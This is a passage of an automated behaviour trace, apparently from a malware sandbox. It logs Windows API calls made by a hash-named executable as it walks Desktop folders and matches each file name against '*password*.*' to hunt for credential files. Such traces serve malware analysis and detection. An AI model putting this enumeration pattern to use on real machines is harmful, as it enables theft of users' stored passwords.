nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.958] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x39706a0 [0110.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39706a0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.958] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.958] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*password*.*") returned 0 [0110.959] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.959] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.959] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.959] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.959] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x3970498 [0110.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970498, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.959] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.959] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*password*.*") returned 0 [0110.959] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.959] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.959] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x64) returned 0x29a11c0 [0110.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a11c0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.960] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a1230 [0110.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.960] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x39703a8 [0110.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x39703a8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.960] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.960] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*password*.*") returned 0 [0110.960] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.960] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.960] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.960] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.961] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x3970470 [0110.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970470, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.961] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*password*.*") returned 0 [0110.961] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.961] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x38ea518, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970600, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.961] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*password*.*") returned 0 [0110.961] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.961] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970600, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.961] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*password*.*") returned 0 [0110.961] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.961] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x39700d0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970380, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.962] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*password*.*") returned 0 [0110.962] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.962] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.962] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743720 [0110.962] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.962] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.962] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.962] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.962] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x29a2c90, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.962] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*password*.*") returned 0 [0110.962] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.963] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x38ea8d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x3970628, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.963] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*password*.*") returned 0 [0110.963] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.963] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x29a29c0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x39704c0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.963] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*password*.*") returned 0 [0110.963] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.963] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x38ea398, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, 